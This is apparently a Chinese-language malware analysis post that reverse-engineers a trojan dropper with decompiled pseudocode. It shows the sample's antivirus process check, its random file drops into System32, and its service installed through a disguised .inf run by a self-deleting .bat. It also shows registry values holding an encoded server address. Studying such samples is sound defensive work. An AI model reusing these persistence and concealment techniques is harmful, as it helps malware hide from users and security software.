在吾爱破解论坛上面找的样本, 有的加了比较难点的壳. 无奈, 只能找一些没壳的或者简单壳的来分析. 这次分析的算是有点难度, 拭目以待.
程序执行, 会释放一个
EXE
和DLL
, 开启一个X6Remote
的服务.
WinMain
...
/*
* 搜索Rstray.exe进程, Rstray.exe实际上是瑞星杀软的实时监控程序, 存在就创建一个线程,
* 这个线程也不太难懂, 主要就是创建一个窗口, 然后进行消息处理, 不知道为什么要这样做? 这样
* 就能绕过杀软吗?
*/
if ( getProcessID(&Rstray.exe) ) {
LibFileName = 'kernel32.dll';
v6 = LoadLibraryA(&LibFileName);
CreateThread = GetProcAddress(v6, aCreatethread);
(CreateThread)(0, 0, sub_401240, 0, 0, 0);
Sleep(0x64u);
}
...
/*
* 下面这种生成文件名的方式很常见, 分别在系统目录下生成一个DLL名和EXE名, 为后面文件提取
* 资源文件写入做准备.
*/
...
GetSystemDirectoryA = GetProcAddress(v8, &GSD);
(GetSystemDirectoryA)(&String1, 0x104);
lstrcatA(&String1, asc_4045C4); // \
lstrcpyA(&FileName, &String1);
v10 = sub_401480(0x1Au) + 'a';
v11 = sub_401480(0x1Au) + 'a';
v12 = sub_401480(0x1Au) + 'a';
v13 = sub_401480(0x1Au) + 'a';
v14 = sub_401480(0x1Au) + 'a';
v15 = sub_401480(0x1Au);
wsprintfA(&String2, aCCCCCC_dll, v15 + 'a', v14, v13, v12, v11, v10);// 随机DLL
lstrcpyA(Data, &String2);
lstrcatA(&String1, Data);
DeleteFileA(&String1); // String1是System32目录下的一个dll
v16 = sub_401480(0x1Au) + 'a';
v17 = sub_401480(0x1Au) + 'a';
v18 = sub_401480(0x1Au) + 'a';
v19 = sub_401480(0x1Au) + 'a';
v20 = sub_401480(0x1Au) + 'a';
v21 = sub_401480(0x1Au);
wsprintfA(&v33, aCCCCCC, v21 + 'a', v20, v19, v18, v17, v16);
lstrcatA(&FileName, &v33);
lstrcatA(&FileName, a_exe); // FileName是一个System目录下的随机exe
DeleteFileA(&FileName);
0x401DC0
总体分析: 生成两个文件, 一个
.bat
, 另一个.inf
. 利用.bat
执行.inf
, 然后将两者删除. 我平常使用Process Monitor
, 这时候只看见了写入两个文件, 却找不到文件, 增加了一点难度.
...
(GetSystemDirectoryA)(&v36, 0x104);
v15 = sub_401480(0x1Au) + 'a';
v16 = sub_401480(0x1Au) + 'a';
v17 = sub_401480(0x1Au) + 'a';
v18 = sub_401480(0x1Au) + 'a';
v19 = sub_401480(0x1Au) + 'a';
v20 = sub_401480(0x1Au);
wsprintfA(&v43, aCCCCCC, v20 + 'a', v19, v18, v17, v16, v15);
wsprintfA(&FileName, aSOwy1815552_in, &v36); // System/xxxxx.inf
wsprintfA(&v37, aSOwy1815552_ba, &v36); // System/xxxxx.bat
memset(&v41, 0, 0xF8u);
qmemcpy(&v32, aSignatureWindo, 0x19u); // Signature="$WINDOWS NT$"
memset(&v33, 0, 0xE8u);
v34 = 0;
v35 = 0;
v21 = (CreateFileA)(&FileName, GENERIC_WRITE, CREATE_ALWAYS,0, 2, 0x80, 0);
v22 = lstrlenA(String);
wrireFile(v21, String, v22 + 1, &varC, 0);
v22 = lstrlenA(String);
wrireFile(v21, String, v22 + 1, &varC, 0);
SFP(v21, -1, 0, 1);
v23 = lstrlenA(&v32);
wrireFile(v21, &v32, v23 + 1, &varC, 0);
/*
* 写入
* [Version]
* Signature="$WINDOWS NT$"
*/
wsprintfA(&v29, aSS_0, X6Remote, aMy_addservice_);// X6Remote,,My_AddService_Name
WritePrivateProfileStringA(AppName, KeyName, &v29, &FileName);// (DefaultInstall.Services, AddService, "X6Remote,,My_AddService_Name", XXXXX.inf)
WritePrivateProfileStringA(aMy_addservice_, aDisplayname, Microsoft_Device_Manager, &FileName);// My_AddService_Name
WritePrivateProfileStringA(aMy_addservice_, aDescription, watch, &FileName);
WritePrivateProfileStringA(aMy_addservice_, aServicetype, a0x10, &FileName);// 0x10
WritePrivateProfileStringA(aMy_addservice_, aStarttype, a2, &FileName);// 2
WritePrivateProfileStringA(aMy_addservice_, aErrorcontrol, a0, &FileName);// 0
...
WritePrivateProfileStringA(aMy_addservice_, ServiceBinary, XXXXX.exe, &FileName);
.inf
的内容:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=X6Remote,,My_AddService_Name
[My_AddService_Name]
DisplayName=Microsoft Device Manager
Description=监测和监视新硬件设备并自动更新设备驱动。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\WINDOWS\system32\xxxxx.exe
写入.bat
wsprintfA(&v31, &rundll32.exe, &FileName); //
// rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %s
v24 = (CreateFileA)(&v37, 0x40000000, 2, 0, 2, 0x80, 0);
v25 = lstrlenA(&v31);
/*
* 写入内容: rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 xxxxx.inf
*/
wrireFile(v24, &v31, v25 + 1, &v132, 0); // System/xxxxx.bat
CloseHandle(v24);
Rstray.exe = 'RsTray.exe';
if ( getProcessID(&Rstray.exe) )
{
v26 = LoadLibraryA(LibFileName);
CreateThread = GetProcAddress(v26, aCreatethread);
(CreateThread)(0, 0, sub_401240, 0, 0, 0);
Sleep(0x64u);
}
(WinExec)(&v37, 0); // 执行.bat文件
Sleep(3000u);
DeleteFileA(&FileName); // 删除.inf
return DeleteFileA(&v37); //删除 .bat
.exe
和.inf
, 函数都是0x4014A0
, 只是参数不一样而已步骤: FindSource-->LoadSource-->CreateFile-->SizeOfSource-->WriteFile, 很平常的步骤
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, ValueName, REG_SZ, Data, v22, 0);// DLL_Name: 随机生成的DLL名
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, aConnectgroup, REG_SZ, aMS, v23, 0);// ConnectGroup: 默认分组
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, aUrl, REG_SZ, aAaaaaa87xz6eii, v24, 0);// URL: AAAAAA/87xz6eIiIuLp+TL/LOPiYmJiZk=
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, aLoad_path, 1u, &String, v25, 0);// Load_Path: system/XXXXX.exe
总结: 写入注册表和.inf
文件的执行,这两者是相互补充的.
StartService
删除注册表服务, 重启电脑, 再不放心可以删除释放的
EXE
和DLL
文件. 下一篇文章分析释放的EXE
文件.
吾爱破解
对应IDB数据库下载